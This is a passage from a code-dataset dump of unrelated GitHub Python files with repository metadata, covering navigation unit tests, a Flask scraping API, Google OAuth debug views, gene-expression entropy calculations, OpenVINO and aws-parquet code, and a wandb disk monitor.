theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"CA02_300_InvalidPressure.xml\")\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for invalid body\" )\r\n \r\n def test300_995_ShouldRaiseExceptionOnInvalidHorizon(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"CA02_300_InvalidHorizon.xml\")\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for invalid body\" )\r\n \r\n \r\n\r\n\r\n \r\n\r\n# helper methods\r\n def indexInList(self, target, searchList):\r\n for index in range(len(searchList)):\r\n if(target in searchList[index]):\r\n return index\r\n return -1\r\n \r\n def cleanup(self):\r\n if(os.path.isfile(self.RANDOM_LOG_FILE)):\r\n os.remove(self.RANDOM_LOG_FILE) \r\n \r\n \r\n \r\n#*******************************************************************************************************************\r\n# Unit Tests\r\n#*******************************************************************************************************************\r\n\r\n#Sighting.Py\r\n#I plan to use the 400's for all of the sightings tests to just make things easier on me, incrementing by 10s\r\n\r\n\r\n# Unit Test: 400_010\r\n# Analysis - Get adjusted Altitude\r\n# inputs\r\n# none\r\n# outputs\r\n# adjusted altitude\r\n# state change\r\n# adjusted altitude changes\r\n#\r\n# Happy path\r\n# nominal case: getAdjustedAltitude()\r\n# Sad path\r\n# none\r\n\r\n def test400_010_ShouldGetAdjustedAltitude(self):\r\n adjustedAltitude = self.sighting.getAdjustedAltitude()\r\n self.assertAlmostEqual(adjustedAltitude, 59.93822, 3)\r\n\r\n# Unit Test: 410_010\r\n# Analysis - Calculate Dip\r\n# inputs\r\n# height\r\n# outputs\r\n# calculated dip\r\n# state change\r\n# none\r\n#\r\n# Happy path\r\n# nominal case: _calculateDip()\r\n# Sad path\r\n# none\r\n\r\n def test410_010_CalculateDipWithNatural(self):\r\n dip = self.sighting._calculateDip(self.height_1, self.horizon_1)\r\n self.assertAlmostEqual(dip, -.05112, 3)\r\n\r\n\r\n def test410_020_CalculateDipWithArtificial(self):\r\n dip = self.sighting._calculateDip(self.height_1, self.horizon_2)\r\n self.assertEqual(dip, 0)\r\n\r\n# Unit Test: 420_010\r\n# Analysis - Calculate Refraction\r\n# inputs\r\n# height\r\n# outputs\r\n# calculated dip\r\n# state change\r\n# none\r\n#\r\n# Happy path\r\n# nominal case: _CalculateRefraction()\r\n# Sad path\r\n# none\r\n\r\n def test420_010_CalculateRefraction(self):\r\n altitudeAngle = Angle.Angle()\r\n altitudeAngle.setDegreesAndMinutes(self.altitude_1)\r\n refraction = self.sighting._calculateRefraction(self.pressure_1, self.temperature_1, altitudeAngle)\r\n # Calculated by hand\r\n self.assertAlmostEqual(refraction, -.0106475, 5)\r\n \r\n \r\n \r\n#500s will be used for SightingsList \r\n \r\n# Unit Test: 500_010\r\n# Analysis - Constructor and getSightingsList\r\n# inputs\r\n# filename\r\n# outputs\r\n# none\r\n# state change\r\n# none\r\n#\r\n# Happy path\r\n# nominal case: SightingsList()\r\n# Sad path\r\n# File does not exist\r\n\r\n def test500_010_CreateSightingsList(self):\r\n sightingsListObject = SightingsList.SightingsList(\"sightingFile.xml\")\r\n sightingList = sightingsListObject.getSightingsList()\r\n self.assertEqual(len(sightingList), 2)\r\n \r\n# Unit Test: 510_010\r\n# Analysis - 
_extractSighting\r\n# inputs\r\n# xml node\r\n# outputs\r\n# Sighting object\r\n# state change\r\n# none\r\n#\r\n# Happy path\r\n# nominal case: _extractSighting()\r\n# Sad path\r\n# none, already validated\r\n\r\n def test510_010_ShouldCreateSighting(self):\r\n sightingsListObject = SightingsList.SightingsList(\"sightingFile.xml\")\r\n XMLDOM = ET.parse(\"../Resources/sightingFile.xml\")\r\n fix = XMLDOM.getroot()\r\n sightings = []\r\n for sighting in fix:\r\n sightings.append(sightingsListObject._extractSighting(sighting))\r\n for sighting in sightings:\r\n self.assertIsInstance(sighting, Sighting.Sighting)\r\n pass\r\n \r\n \r\n#600s will be used for logFile \r\n \r\n# Unit Test: 600_010\r\n# Analysis - Constructor\r\n# inputs\r\n# filename - optional\r\n# outputs\r\n# none\r\n# state change\r\n# change to log file or creation of log file\r\n#\r\n# Happy path\r\n# nominal case: LogFile()\r\n# Sad path\r\n# bad filename\r\n\r\n def test600_010_ShouldModifyLogFile(self):\r\n logFile = LogFile.LogFile(\"test.txt\")\r\n self.assertIsInstance(logFile, LogFile.LogFile)\r\n self.assertTrue(os.path.isfile('../Resources/' + 'test.txt'))\r\n pass\r\n \r\n def test600_910_BadFileName(self):\r\n with self.assertRaises(ValueError):\r\n LogFile.LogFile(\"test.txsdft\")\r\n\r\n# Unit Test: 610_010\r\n# Analysis - Write To log\r\n# inputs\r\n# filename - optional\r\n# outputs\r\n# none\r\n# state change\r\n# Log has a new entry\r\n#\r\n# Happy path\r\n# nominal case: writeToLogEntry()\r\n# Sad path\r\n# bad filename\r\n\r\n# I have not thought of an easy way to test these types of things. I can always parse the file looking for the new entry, \r\n# but this might be something i implement at a future date\r\n# also, if 600_010_SHouldModifyLogFile() doesn't break, it is likely that this worked as most likely a value error would occur if not","repo_name":"ascherer1993/wbd","sub_path":"SoftwareProcess/Navigation/test/FixTest.py","file_name":"FixTest.py","file_ext":"py","file_size_in_byte":30353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9577874936","text":"import os\nfrom itertools import dropwhile\n\nDIR = 'some_data'\nresult = dict.fromkeys([10 ** value for value in range(1, 6)], 0)\nresult_keys = [0] + list(result.keys())\n\ndef add_to_dict(path):\n size = os.stat(path).st_size\n try:\n current_key = list(dropwhile(lambda x: x <= size, result_keys))[0]\n except IndexError:\n print(f'file {f.name} is too large!')\n else:\n result[current_key] += 1\n\n\nfor root, dirs, files in os.walk(DIR):\n print(root)\n\n for f in os.scandir(root):\n if f.is_file():\n add_to_dict(f)\n\nprint(result)","repo_name":"demade74/de_course","sub_path":"q1/python/Kulushev_Konstantin_dz_7/Kulushev_Konstantin_dz_7_task_4.py","file_name":"Kulushev_Konstantin_dz_7_task_4.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19672382550","text":"from api.config import db\nfrom api.models import ScrapeJob\nfrom flask import abort, redirect\nimport re\n\ndef create(job):\n if not re.match(r'^(https?)://[^\\s/$.?#].[^\\s]*$', job['url']):\n abort(400, \"Misformatted URL.\")\n if not job.get('scrape_text', True) and not job.get('scrape_images', True):\n abort(400, \"Either 'scrape_text' or 'scrape_images' must be true.\")\n\n existing_job = ScrapeJob.get_most_recent_match(job)\n if existing_job is None or job.get('force_new', False):\n new_job = 
ScrapeJob.from_dict(job)\n db.session.add(new_job)\n db.session.commit()\n return new_job.to_dict(), 201\n else:\n return redirect(\n '/scrape-jobs/' + str(existing_job.id), \n code=303,\n )\n\ndef get_status(job_id):\n existing_job = ScrapeJob.get_by_id(job_id)\n if existing_job is not None:\n return existing_job.to_dict(), 200\n else:\n abort(404, f\"Scrape Job not found for ID: {job_id}\")\n","repo_name":"Berciq/scraper-microservice","sub_path":"api/api/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26902182407","text":"# This is only for testing purposes. Will be removed after integration with frontend.\n\nimport requests\nfrom django.conf import settings\nfrom account.decorators import debug_only\nfrom django.http import HttpResponse, HttpResponseRedirect\n\n@debug_only\ndef google_login(request):\n auth_url = f'https://accounts.google.com/o/oauth2/auth?' \\\n f'client_id={settings.GOOGLE_CLIENT_ID}&' \\\n f'redirect_uri={settings.REDIRECT_URI}&' \\\n f'scope=email profile openid&' \\\n f'response_type=code'\n return HttpResponseRedirect(auth_url)\n\n@debug_only\ndef google_callback(request):\n code = request.GET.get('code')\n \n token_url = 'https://accounts.google.com/o/oauth2/token'\n token_payload = {\n 'code': code,\n 'client_id': settings.GOOGLE_CLIENT_ID,\n 'client_secret': settings.GOOGLE_CLIENT_SECRET,\n 'redirect_uri': settings.REDIRECT_URI,\n 'grant_type': 'authorization_code',\n }\n token_response = requests.post(token_url, data=token_payload)\n\n if token_response.status_code == 200:\n tokens = token_response.json()\n access_token = tokens.get('access_token')\n return HttpResponse(access_token)\n return HttpResponse(\"Invalid credentials\")\n ","repo_name":"ravigrauniyar/pde5backend","sub_path":"account/views/access_token_genrator_view.py","file_name":"access_token_genrator_view.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25567073543","text":"__all__ = [\n 'H_constitutive',\n 'H_external', 'H_ON_external', 'H_OFF_external', 'I_external',\n 'set_n_processes', 'symbolic_H',\n]\n\nimport atexit\nimport logging\nimport math\nimport multiprocessing as mp\nimport os\nimport pathlib\nimport signal\nimport subprocess as sub\nfrom multiprocessing import pool\n\nimport mpmath\nfrom sympy import *\nfrom sympy.abc import *\nfrom sympy import E, N as evalf\n\nimport utils\nfrom functions import log2\nfrom steady_state import alpha_n_external, beta_n_external, palpha, phi_n_external\n\n\ndef set_n_processes(n):\n \"\"\"Initialize number of worker processes in pool. 
Should be called right after imports.\"\"\"\n global N_PROCESSES\n N_PROCESSES = n\nset_n_processes(os.cpu_count())\n\n\nDOC = {\n 'epsilon': \"ratio between promoter switching rates and protein degradation rate\",\n 'palpha': \"probability of finding the promoter at the ON state\",\n 'N': \"mean number of proteins of a constitutive gene with the same synthesis/degradation rates\",\n 'k': \"upper bound of summation for the entropy calculation\",\n 'precision': \"number of decimal digits of precision\",\n 'method': \"either 'maple', 'maple-async', 'sympy' or 'sympy-parallel'\",\n 'backup_method': \"(list of) backup method(s) to try if 'method' fails\",\n 'func': \"function to be computed\",\n 'subs': \"dictionary with parameters to 'func'\",\n}\n\nsymbolic_H = {}\n\n\n### Constitutive gene ###\n\n\"\"\" Shannon entropy for a constitutive gene with mean expression N.\n\n oo n\n ⎛N⎞ \\⎺⎺⎺` ⎛N -N ⎞\n H = -N⋅log₂⎜─⎟ + ⟩ ⎜──⋅e ⋅log₂(n!)⎟\n ⎝e⎠ /⎽⎽⎽, ⎝n! ⎠\n n = 0\n\"\"\"\nH_poisson_const = -N*log2(N/E)\nH_poisson_sum_term = N**n / factorial(n) * exp(-N) * log2(factorial(n))\nH_poisson_sum = Sum(H_poisson_sum_term, (n, 0, oo))\nsymbolic_H['constitutive'] = H_poisson_const + H_poisson_sum\n\n@utils.memoized\ndef H_constitutive(N, precision=mpmath.mp.dps):\n \"\"\"Shannon entropy for the constitutive gene model.\n\n :N: mean number of proteins\n :precision: {precision}\n :returns: entropy of a gene with parameter 'N'\n \"\"\"\n return symbolic_H['constitutive'].evalf(precision, subs={'N': N})\n\n\n### Binary gene ###\n\n# Auxiliary expressions for parallel computation on SymPy.\nparallel_H = {}\nparallel_n = i*N_PROCESSES + c # i: index; c: constant\n\n\n## External Regulation Gene ##\n\n\"\"\" Shannon entropy for the binary stochastic gene model.\n\n ∞\n H = - ∑ φₙ⋅log₂(φₙ)\n n=0\n\"\"\"\n\nH_external_sum_term = phi_n_external*log2(phi_n_external)\nsymbolic_H['external'] = -Sum(H_external_sum_term, (n, 0, oo))\nparallel_H['external'] = -Sum(H_external_sum_term.subs(n, parallel_n), (i, 0, oo))\n\ndef H_external(epsilon, palpha, N, k=oo, precision=mpmath.mp.dps, method='sympy-parallel', backup_method=None):\n \"\"\"Shannon entropy for the externally regulated gene model.\n\n :epsilon: {epsilon}\n :palpha: {palpha}\n :N: {N}\n :k: {k}\n :precision: {precision}\n :method: {method}\n :backup_method: {backup_method}\n :returns: shannon entropy of gene with parameters ε, pₐ and N\n \"\"\"\n subs = {'epsilon': epsilon, 'p_a': palpha, 'N': N}\n return _H_dispatch('external', subs, k, precision, method, backup_method)\n\n\n\"\"\"Shannon entropy of the number of proteins conditional to the promoter state being ON or OFF.\n\n oo\n \\⎺⎺⎺` αₙ ⎛αₙ⎞\n H = - ⟩ ──⋅log₂⎜──⎟\n ON /⎽⎽⎽, pₐ ⎝pₐ⎠\n n = 0\n\"\"\"\n\nH_ON_external_sum_term = alpha_n_external/palpha*log2(alpha_n_external/palpha)\nsymbolic_H['ON_external'] = -Sum(H_ON_external_sum_term, (n, 0, oo))\nparallel_H['ON_external'] = -Sum(H_ON_external_sum_term.subs(n, parallel_n), (i, 0, oo))\n\ndef H_ON_external(epsilon, palpha, N, k=oo, precision=mpmath.mp.dps, method='sympy-parallel', backup_method=None):\n \"\"\"Entropy conditional to ON state for the externally regulated gene model.\n\n :epsilon: {epsilon}\n :palpha: {palpha}\n :N: {N}\n :k: {k}\n :precision: {precision}\n :method: {method}\n :backup_method: {backup_method}\n :returns: shannon entropy of the distribution given the promoter is at ON state\n \"\"\"\n subs = {'epsilon': epsilon, 'p_a': palpha, 'N': N}\n return _H_dispatch('ON_external', subs, k, precision, method, 
backup_method)\n\nH_OFF_external_sum_term = beta_n_external/(1 - palpha)*log2(beta_n_external/(1 - palpha))\nsymbolic_H['OFF_external'] = -Sum(H_OFF_external_sum_term, (n, 0, oo))\nparallel_H['OFF_external'] = -Sum(H_OFF_external_sum_term.subs(n, parallel_n), (i, 0, oo))\n\ndef H_OFF_external(epsilon, palpha, N, k=oo, precision=mpmath.mp.dps, method='sympy-parallel', backup_method=None):\n \"\"\"Entropy conditional to OFF state for the externally regulated gene model.\n\n :epsilon: {epsilon}\n :palpha: {palpha}\n :N: {N}\n :k: {k}\n :precision: {precision}\n :method: {method}\n :backup_method: {backup_method}\n :returns: shannon entropy of the distribution given the promoter is at OFF state\n \"\"\"\n subs = {'epsilon': epsilon, 'p_a': palpha, 'N': N}\n return _H_dispatch('OFF_external', subs, k, precision, method, backup_method)\n\n\n\"\"\"Mutual information for the externally regulated gene model.\n\n ⎛ ⎞\n I(X; Y) = H(X) - H(X|Y) = H - ⎜pₐ⋅H + (1-pₐ)⋅H ⎟\n ⎝ ON OFF⎠\n\"\"\"\n\nclass IAsyncResult(pool.AsyncResult):\n \"\"\"Wrapper to multiple AsyncResult's\"\"\"\n def __init__(self, palpha, hs):\n self.palpha = palpha\n is_async = (isinstance(res, pool.AsyncResult) for res in hs)\n self.results = tuple(zip(hs, is_async))\n\n def ready(self):\n return all(not is_async or res.ready() for res, is_async in self.results)\n\n def successful(self):\n return all(not is_async or res.successful() for res, is_async in self.results)\n\n def wait(self, timeout=None):\n for res, is_async in self.results:\n if is_async:\n res.wait(timeout)\n\n def get(self, timeout=None):\n h, h_on, h_off = (res.get(timeout) if is_async else res for res, is_async in self.results)\n return h - self.palpha*h_on - (1 - self.palpha)*h_off\n\ndef I_external(epsilon, palpha, N, k=oo, precision=mpmath.mp.dps, method='sympy-parallel', backup_method=None):\n \"\"\"Mutual information for the externally regulated gene model.\n\n :epsilon: {epsilon}\n :palpha: {palpha}\n :N: {N}\n :k: {k}\n :precision: {precision}\n :method: {method}\n :backup_method: {backup_method}\n :returns: mutual information of gene with parameters ε, pₐ and N\n \"\"\"\n h = H_external(epsilon, palpha, N, k, precision, method, backup_method)\n h_on = H_ON_external(epsilon, palpha, N, k, precision, method, backup_method)\n h_off = H_OFF_external(epsilon, palpha, N, k, precision, method, backup_method)\n hs = (h, h_on, h_off)\n\n if any(res is None for res in hs):\n return None\n elif any(isinstance(res, pool.AsyncResult) for res in hs):\n return IAsyncResult(palpha, hs)\n else:\n return h - palpha*h_on - (1 - palpha)*h_off\n\n\n### Internals ###\n\ndef _H_dispatch(func, subs, k, precision, method, backup_method):\n \"\"\"Backend calculation dispatcher.\n\n :func: {func}\n :subs: {subs}\n :k: {k}\n :precision: {precision}\n :method: {method}\n :backup_method: {backup_method}\n :returns: result of 'func' calculation using the required method(s)\n \"\"\"\n assert method in {'maple', 'maple-async', 'sympy', 'sympy-parallel'}\n if isinstance(backup_method, str):\n backup_method = [backup_method]\n\n if method == 'maple':\n res = _H_maple(func, subs, k, precision)\n elif method == 'maple-async':\n # FIXME: avoid 'backup_method' bypass by a None returned later by a pool.AsyncResult.\n # Things should work in a program rerun since (some of) these None async results would be\n # already cached.\n res = global_pool().apply_async(_H_maple, [func, subs, k, precision])\n try:\n res = res.get(timeout=0.1)\n except mp.TimeoutError:\n return res\n\n else: # method is 
'sympy' or 'sympy-parallel'\n res = _H_sympy(func, subs, k, precision, parallel=method.endswith('parallel'))\n\n if res is None and backup_method:\n log_msg = \"_H_dispatch: method '%s' failed, trying '%s' for '%s' with parameters %s\"\n logging.debug(log_msg, method, backup_method[0], func, str(subs))\n return _H_dispatch(func, subs, k, precision, method=backup_method[0], backup_method=backup_method[1:])\n\n return res\n\nmp_pool = None\ndef global_pool():\n \"\"\"Initialize pool of worker processes only when a function requires it.\"\"\"\n global mp_pool\n if mp_pool is None:\n mp_pool = mp.Pool(processes=N_PROCESSES)\n atexit.register(mp_pool.close)\n return mp_pool\n\ndef _map_evalf(arg):\n \"\"\"Auxiliary function for parallel numeric evaluation.\n\n :arg: 2-tuple with the variable x and the precision\n :returns: result equivalent to expr.evalf(x, n)\n \"\"\"\n return evalf(x=arg[0], n=arg[1])\n\n@utils.memoized\ndef _H_sympy(func, subs, k, precision, parallel):\n \"\"\"Calculate entropy in SymPy.\n\n :func: {func}\n :subs: {subs}\n :k: {k}\n :precision: {precision}\n :parallel: wether to run summation in parallel\n :returns: result of 'func' evaluation in SymPy with parameters in 'subs'\n \"\"\"\n expr = parallel_H[func] if parallel else symbolic_H[func]\n\n try:\n if not parallel:\n expr = expr.replace(oo, k)\n res = expr.evalf(precision, subs)\n if res == 0:\n raise RuntimeError\n else:\n # Parallel evaluation requires integers or fractions(?).\n expr = expr.subs({key: Rational(str(val)) for key, val in subs.items()})\n expr = expr.replace(oo, k/N_PROCESSES)\n args = [(expr.subs('c', c), precision) for c in range(N_PROCESSES)]\n partial_sums = global_pool().map(_map_evalf, args)\n if any(x == 0 for x in partial_sums):\n raise RuntimeError\n res = sum(partial_sums)\n if logging.getLogger().level >= logging.INFO:\n print(\".\", end=\"\", flush=True) # show progress\n return res\n\n # Note: NaN is stored as None (NULL) in diskcache (SQLite).\n except (RuntimeError, TypeError):\n logging.debug(\"_H_sympy: invalid result with precision = {}.\".format(precision))\n if precision >= 75:\n return None\n return _H_sympy(func, subs, k, precision + 15, parallel)\n except (mpmath.libmp.NoConvergence, ValueError):\n logging.debug(\"_H_sympy: convergence exception with parameters ε = %(epsilon)f, pₐ = %(p_a)f, N = %(N)d\", subs)\n return None\n\nroot = pathlib.Path(__file__).parent.resolve()\nmaple_external = root/'entropy_external.mpl'\n@utils.memoized()\ndef _H_maple(func, subs, k, precision):\n \"\"\"Calculate entropy using Maple.\n\n :func: {func}\n :subs: {subs}\n :k: {k}\n :precision: {precision}\n :returns: result of 'func' evaluation in Maple with parameters in 'subs'\n \"\"\"\n maple_func = 'H_' + func\n args = (maple_func, subs['epsilon'], subs['p_a'], subs['N'], precision)\n args = '-cp:=' + ','.join(str(a) for a in args)\n if not k is oo:\n args += ',' + str(k)\n logging.debug(\"_H_maple: calling Maple with command: %s %s\", maple_external, args)\n\n with sub.Popen([maple_external, args], stdout=sub.PIPE,\n start_new_session=True, universal_newlines=True) as proc:\n pgid = os.getpgid(proc.pid)\n\n # Maple subprocesses like to lie around forever... 
So we KILL it!\n @atexit.register\n def kill_maple(who='atexit'):\n try:\n os.killpg(pgid, signal.SIGKILL)\n logging.debug(\"%s: killing process group %d\", who, pgid)\n except ProcessLookupError:\n pass\n\n try:\n proc.wait(600)\n res = Float(proc.stdout.readline())\n if math.isnan(res):\n logging.debug(\"_H_maple: invalid result with precision = {}.\".format(precision))\n if precision >= 75:\n return None\n return _H_maple(func, subs, k, precision + 15)\n except sub.TimeoutExpired:\n proc.terminate()\n res = None\n finally:\n atexit.unregister(kill_maple)\n kill_maple(who='_H_maple')\n\n if logging.getLogger().level >= logging.INFO:\n print(\".\", end=\"\", flush=True) # show progress\n return res\n\n\nfor func in (H_constitutive, H_external, H_ON_external, H_OFF_external, I_external, _H_dispatch, _H_maple):\n func.__doc__ = func.__doc__.format(**DOC)\n","repo_name":"amphybio/stochastic-gene-expression","sub_path":"entropy2020/src/entropy.py","file_name":"entropy.py","file_ext":"py","file_size_in_byte":12868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5548263171","text":"def minimumCardPickup(cards):\n # Set to track if a card has already been visited\n s = set()\n \n maxValue = len(cards) + 1\n minCount = maxValue\n \n \n i,j = 0,0\n \n while j < len(cards):\n # If the card at index j is already in set that means we found a matching pair\n # So we can shrink the window until the element is still in set and also find the minimum length in each iteration\n if cards[j] in s:\n while cards[j] in s:\n minCount = min(minCount, j - i + 1)\n if cards[i] in s: s.discard(cards[i])\n i += 1\n \n # At this point, we are sure that card at index j is not in set so we can safely put it in set\n s.add(cards[j])\n j += 1\n \n return minCount if minCount != maxValue else -1\n\ncards = [3,4,2,3,4,7]\nminimumCards = minimumCardPickup(cards)\n\nprint(\"Minimum number of consecutive cards you have to pick up to have a pair of matching cards ->\", minimumCards)","repo_name":"itsarvindhere/Sliding-Window","sub_path":"025. 
Minimum Consecutive Cards to Pick Up/Cards.py","file_name":"Cards.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13022936419","text":"import numpy as np\n\nfrom mo.graph.graph import Graph\nfrom mo.middle.replacement import MiddleReplacementPattern\nfrom mo.ops.const import Const\n\n\nclass AnchorToPriorBoxes(MiddleReplacementPattern):\n \"\"\"\n Crop anchors consts before replacing subgraph with all anchors\n \"\"\"\n enabled = True\n force_clean_up = True\n graph_condition = [lambda graph: graph.graph['fw'] == 'mxnet' and graph.graph['cmd_params'].enable_ssd_gluoncv]\n\n def run_after(self):\n from extensions.middle.pass_separator import MiddleStart\n return [MiddleStart]\n\n def pattern(self):\n return dict(\n nodes=[\n ('const', dict(op='Const')),\n ('const_data', dict(kind='data')),\n ('slice_like', dict(op='Crop')),\n ('slice_like_out', dict(kind='data')),\n ('reshape', dict(op='Reshape')),\n ],\n edges=[\n ('const', 'const_data'),\n ('const_data', 'slice_like', {'in': 0}),\n ('slice_like', 'slice_like_out'),\n ('slice_like_out', 'reshape'),\n ]\n )\n\n def replace_pattern(self, graph: Graph, match: dict):\n slice_like = match['slice_like']\n anchor_node = slice_like.in_port(0).get_source().node\n reshape = slice_like.out_nodes()[0].out_node()\n slice_shape = slice_like.out_nodes()[0].shape\n anchor_node.value = np.copy(anchor_node.value[:slice_shape[0], :slice_shape[1],\n :slice_shape[2], :slice_shape[3], :slice_shape[4]])\n anchor_node.shape = slice_shape\n\n val_node = Const(graph, {'name': slice_like.name +'/croped_', 'value': anchor_node.value[:slice_shape[0], :slice_shape[1],\n :slice_shape[2], :slice_shape[3], :slice_shape[4]], 'shape': slice_shape}).create_node_with_data()\n slice_like.in_port(0).disconnect()\n slice_like.in_port(1).disconnect()\n slice_like.out_port(0).disconnect()\n reshape.in_port(0).connect(val_node.in_node().out_port(0))\n","repo_name":"Namptiter/OpenVINO-Darknet-YOLOv3","sub_path":"model_optimizer/extensions/middle/AnchorToPriorBox.py","file_name":"AnchorToPriorBox.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"70499255147","text":"\"\"\"Test the dataset module.\"\"\"\nimport os\nfrom typing import Iterator\nfrom uuid import uuid4\n\nimport awswrangler as wr\nimport pandas as pd\nimport pandera as pa\nimport pytest\n\nfrom aws_parquet.dataset import ParquetDataset\n\n\n@pytest.fixture\ndef schema() -> pa.DataFrameSchema:\n \"\"\"Create a schema.\"\"\"\n\n class MyDatasetSchemaModel(pa.SchemaModel):\n \"\"\"Schema for the dataset.\"\"\"\n\n col1: pa.typing.Series[int] = pa.Field(ge=0)\n col2: pa.typing.Series[pa.DateTime]\n col3: pa.typing.Series[float] = pa.Field(ge=0)\n col4: pa.typing.Series[pa.Category]\n col5: pa.typing.Series[pd.CategoricalDtype] = pa.Field(\n dtype_kwargs={\"categories\": [\"a\", \"b\", \"c\"]}\n )\n\n return MyDatasetSchemaModel.to_schema()\n\n\n@pytest.fixture\ndef dataset(schema: pa.DataFrameSchema) -> Iterator[ParquetDataset]:\n \"\"\"Create a dataset.\"\"\"\n table_name = str(uuid4()).replace(\"-\", \"\")\n bucket_name = os.environ[\"AWS_S3_BUCKET\"]\n\n dataset = ParquetDataset(\n database=\"default\",\n table=table_name,\n partition_cols=[\"col1\", \"col2\"],\n path=f\"s3://{bucket_name}/{table_name}/\",\n pandera_schema=schema,\n )\n\n yield dataset\n dataset.delete()\n\n\n@pytest.fixture\ndef df() -> 
pd.DataFrame:\n \"\"\"Create a dataframe.\"\"\"\n return pd.DataFrame(\n {\n \"col1\": [1, 2, 3],\n \"col2\": [\"2021-01-01\", \"2021-01-02\", \"2021-01-03\"],\n \"col3\": [1.0, 2.0, 3.0],\n \"col4\": [\"a\", \"b\", \"z\"],\n \"col5\": [\"a\", \"b\", \"c\"],\n }\n )\n\n\ndef test_dataset_create(dataset: ParquetDataset) -> None:\n \"\"\"Test the create method.\"\"\"\n dataset.create()\n assert wr.catalog.does_table_exist(database=dataset.database, table=dataset.table)\n\n with pytest.raises(Exception):\n dataset.create(if_exists=\"raise\")\n\n with pytest.warns(Warning):\n dataset.create(if_exists=\"warn\")\n\n\ndef test_dataset_update(\n dataset: ParquetDataset, schema: pa.DataFrameSchema, df: pd.DataFrame\n) -> None:\n \"\"\"Test the update method.\"\"\"\n dataset.create()\n dataset.update(df)\n out = dataset.read()\n assert out.equals(schema(df))\n\n\ndef test_dataset_read_partition(\n dataset: ParquetDataset, schema: pa.DataFrameSchema, df: pd.DataFrame\n) -> None:\n \"\"\"Test the read method.\"\"\"\n dataset.create()\n dataset.update(df)\n out = dataset.read(partition={\"col1\": \"1\", \"col2\": \"2021-01-01\"})\n assert out.equals(schema(df[(df[\"col1\"] == 1) & (df[\"col2\"] == \"2021-01-01\")]))\n\n\ndef test_dataset_delete_partition(\n dataset: ParquetDataset, schema: pa.DataFrameSchema, df: pd.DataFrame\n) -> None:\n \"\"\"Test the delete method.\"\"\"\n dataset.create()\n dataset.update(df)\n dataset.delete(partition={\"col1\": \"1\", \"col2\": \"2021-01-01\"})\n out = dataset.read()\n assert out.equals(\n schema(df[~((df[\"col1\"] == 1) & (df[\"col2\"] == \"2021-01-01\"))]).reset_index(\n drop=True\n )\n )\n\n dataset.update(df, overwrite=True)\n dataset.delete(partition={\"col2\": \"2021-01-01\"})\n out = dataset.read()\n assert out.equals(schema(df[~(df[\"col2\"] == \"2021-01-01\")]).reset_index(drop=True))\n","repo_name":"marwan116/aws-parquet","sub_path":"tests/test_dataset.py","file_name":"test_dataset.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"8396529321","text":"import threading\nfrom collections import deque\nfrom typing import TYPE_CHECKING, List, Optional\n\ntry:\n import psutil\nexcept ImportError:\n psutil = None\n\nfrom wandb.errors.term import termwarn\n\nfrom .aggregators import aggregate_mean\nfrom .asset_registry import asset_registry\nfrom .interfaces import Interface, Metric, MetricsMonitor\n\nif TYPE_CHECKING:\n from typing import Deque\n\n from wandb.sdk.internal.settings_static import SettingsStatic\n\n\nclass DiskUsagePercent:\n \"\"\"Total system disk usage in percent.\"\"\"\n\n name = \"disk.{path}.usagePercent\"\n samples: \"Deque[List[float]]\"\n\n def __init__(self, paths: List[str]) -> None:\n self.samples = deque([])\n # check if we have access to the disk paths:\n self.paths: List[str] = []\n for path in paths:\n try:\n psutil.disk_usage(path)\n self.paths.append(path)\n except Exception as e: # noqa\n termwarn(f\"Could not access disk path {path}: {e}\", repeat=False)\n\n def sample(self) -> None:\n # self.samples.append(psutil.disk_usage(\"/\").percent)\n disk_usage: List[float] = []\n for path in self.paths:\n disk_usage.append(psutil.disk_usage(path).percent)\n if disk_usage:\n self.samples.append(disk_usage)\n\n def clear(self) -> None:\n self.samples.clear()\n\n def aggregate(self) -> dict:\n if not self.samples:\n return {}\n disk_metrics = {}\n for i, _path in enumerate(self.paths):\n aggregate_i = aggregate_mean([sample[i] for 
sample in self.samples])\n # ugly hack to please the frontend:\n _path = _path.replace(\"/\", \"\\\\\")\n disk_metrics[self.name.format(path=_path)] = aggregate_i\n\n return disk_metrics\n\n\nclass DiskUsage:\n \"\"\"Total system disk usage in GB.\"\"\"\n\n name = \"disk.{path}.usageGB\"\n samples: \"Deque[List[float]]\"\n\n def __init__(self, paths: List[str]) -> None:\n self.samples = deque([])\n # check if we have access to the disk paths:\n self.paths: List[str] = []\n for path in paths:\n try:\n psutil.disk_usage(path)\n self.paths.append(path)\n except Exception as e: # noqa\n termwarn(f\"Could not access disk path {path}: {e}\", repeat=False)\n\n def sample(self) -> None:\n disk_usage: List[float] = []\n for path in self.paths:\n disk_usage.append(psutil.disk_usage(path).used / 1024 / 1024 / 1024)\n if disk_usage:\n self.samples.append(disk_usage)\n\n def clear(self) -> None:\n self.samples.clear()\n\n def aggregate(self) -> dict:\n if not self.samples:\n return {}\n disk_metrics = {}\n for i, _path in enumerate(self.paths):\n aggregate_i = aggregate_mean([sample[i] for sample in self.samples])\n # ugly hack to please the frontend:\n _path = _path.replace(\"/\", \"\\\\\")\n disk_metrics[self.name.format(path=_path)] = aggregate_i\n\n 